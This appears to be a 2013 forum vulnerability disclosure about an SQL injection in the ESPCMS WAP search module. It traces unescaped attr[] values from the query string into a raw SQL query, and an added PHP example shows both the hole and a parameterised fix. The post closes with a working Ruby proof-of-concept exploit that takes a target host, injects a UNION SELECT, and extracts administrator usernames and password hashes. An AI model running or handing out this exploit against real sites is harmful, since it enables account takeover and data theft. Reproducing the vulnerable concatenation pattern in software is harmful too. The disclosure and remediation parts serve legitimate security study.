中国网络渗透测试联盟
Title: SQL injection in the search function of the espcms WAP module
Author: admin
Time: 2013-7-27 18:31
0×0 Vulnerability overview
0×1 Vulnerability details
0×2 PoC

0×0 Vulnerability overview

ESPCMS (易思ESPCMS) is an enterprise website management system built on the LAMP stack. It is described as simple to operate, powerful, stable, extensible and secure, and easy to customise and maintain, so that a professional corporate website can be set up quickly.

It handles incoming parameters carelessly, which leads to SQL injection.

0×1 Vulnerability details

The tainted value travels $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query, and nothing along that path filters it, so the injection happens.

Precisely because the variable is read from $_SERVER['QUERY_STRING'], it bypasses the filtering the program applies to its normal request parameters.

Moreover, the injected variable is an array value, not an array key: the loop escapes the key with addslashes() and inputcodetrim() but concatenates the value as-is, so the value is not filtered either. Together these make for a fairly unusual SQL injection.

In the in_result() function of /interface/3gwap_search.php:

function in_result() {
    ... ... ... ... ... ... ... ... ...
    // raw query string, taken directly from the server variable
    $urlcode = $_SERVER['QUERY_STRING'];
    // decoded and parsed into $output; attr[...] becomes the nested array $output['attr']
    parse_str(html_entity_decode($urlcode), $output);
    ... ... ... ... ... ... ... ... ...
    if (is_array($output['attr']) && count($output['attr']) > 0) {
        $db_table = db_prefix . 'model_att';
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                // only the key is escaped and checked against model_att
                $key = addslashes($key);
                $key = $this->fun->inputcodetrim($key);
                $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                $countnum = $this->db_numrows($db_table, $db_att_where);
                if ($countnum > 0) {
                    // $value is concatenated unescaped: the injection point
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                }
            }
        }
    }
    if (!empty($keyword) && empty($keyname)) {
        $keyname = 'title';
        $db_where .= " AND a.title like '%$keyword%'";
    } elseif (!empty($keyword) && !empty($keyname)) {
        $db_where .= " AND $keyname like '%$keyword%'";
    }
    $pagemax = 15;
    $pagesylte = 1;
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    // $db_where lands in the query text and is executed as-is
    $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
    $sql = $this->htmlpage->PageSQL('a.did', 'down');
    $rs = $this->db->query($sql);
    ... ... ... ... ... ... ... ... ...
}
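The following is an added example, not part of the original writeup and not ESPCMS code. It reproduces the key/value asymmetry described above with a constructed query string, then shows a hardened version of the same attr filter. The query string, the function names vulnerableWhere()/hardenedWhere() and the allowed-attribute list are invented for illustration; table and column names follow the snippet above, and the espcms_ prefix is taken from the PoC.

```php
<?php
// Added example (not ESPCMS code): walks the value from QUERY_STRING into the
// WHERE fragment exactly as the writeup describes, then shows a hardened version.
// The query string, function names and allowed-attribute list are constructed.

// Constructed request: the quote sits in the attr[] VALUE, which the key
// filtering (addslashes + inputcodetrim) never touches.
$_SERVER['QUERY_STRING'] = 'ac=search&at=result&attr[jobnum]=1%27%20or%201=1%23';

// Step 1, same as in_result(): html_entity_decode() first, then parse_str()
// URL-decodes and builds the nested array. Nothing here escapes anything, and
// whatever filtering the application applies to its normal request parameters
// is bypassed, as the writeup notes.
parse_str(html_entity_decode($_SERVER['QUERY_STRING']), $output);
// $output['attr'] is now ['jobnum' => "1' or 1=1#"]

// Step 2, vulnerable: mirrors the original loop. Only $key is escaped;
// $value is concatenated raw into the SQL fragment.
function vulnerableWhere(array $attr): string
{
    $where = '';
    foreach ($attr as $key => $value) {
        if ($value) {
            $key = addslashes($key);                             // key escaped
            $where .= ' AND b.' . $key . '=\'' . $value . '\'';  // value raw
        }
    }
    return $where;
}
echo vulnerableWhere($output['attr']), PHP_EOL;
// AND b.jobnum='1' or 1=1#'
// The quote closes the literal, "or 1=1" makes the condition always true and
// '#' comments out the trailing quote and the LIMIT clause that follow.

// Step 3, hardened: the attribute name is checked against a whitelist (the
// model_att lookup in the original already exists for that purpose) and the
// value becomes a bound parameter instead of part of the SQL text.
function hardenedWhere(array $attr, array $allowedAttrs): array
{
    $where  = '';
    $params = [];
    foreach ($attr as $key => $value) {
        if ($value === null || $value === '') {
            continue;
        }
        // Identifier whitelist: only attribute names known to exist.
        if (!in_array($key, $allowedAttrs, true)) {
            continue;
        }
        $where .= ' AND b.`' . $key . '` = ?';
        $params[] = (string) $value;
    }
    return [$where, $params];
}

// In the real code $allowedAttrs would come from
// SELECT attrname FROM <prefix>model_att WHERE isclass=1; here it is constructed.
[$where, $params] = hardenedWhere($output['attr'], ['jobnum', 'salary']);
echo $where, PHP_EOL;   // AND b.`jobnum` = ?
print_r($params);       // [0] => 1' or 1=1#   -- travels as data, never as SQL

// Executing with PDO (espcms_ prefix assumed from the PoC); left commented so
// the file runs without a database:
// $stmt = $pdo->prepare('SELECT b.*,a.* FROM espcms_document AS a '
//     . 'LEFT JOIN espcms_document_attr AS b ON a.did=b.did' . $where . ' LIMIT 0,15');
// $stmt->execute($params);
```

The whitelist keeps the identifier (which cannot be a bind parameter) under the application's control, and the placeholder means the same payload that breaks vulnerableWhere() is sent to MySQL as a string value, so the quote and the comment marker never reach the parser.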
0×2 PoC
require "net/http"

def request(method, url)
  if method.eql?("get")
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    response = http.request(Net::HTTP::Get.new(uri.request_uri))
    return response
  end
end

doc = <<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
Blog: http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage = <<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} www.target.com 80 /
HERE

puts doc
if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]

  puts "\nsend request..."
  # attr[jobnum] is the injection point: the value closes the quoted literal and
  # appends a 45-column UNION SELECT; column 26 returns username&password
  # (CHAR(38) is '&') from espcms_admin_member, and '#' comments out the rest.
  url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&" \
        "attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13" \
        ",14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27" \
        ",28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
  response = request("get", url)
  # pull "username&<32-char hash>" pairs out of the returned page
  result = response.body.scan(/\w+&\w{32}/)
  puts result
end

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2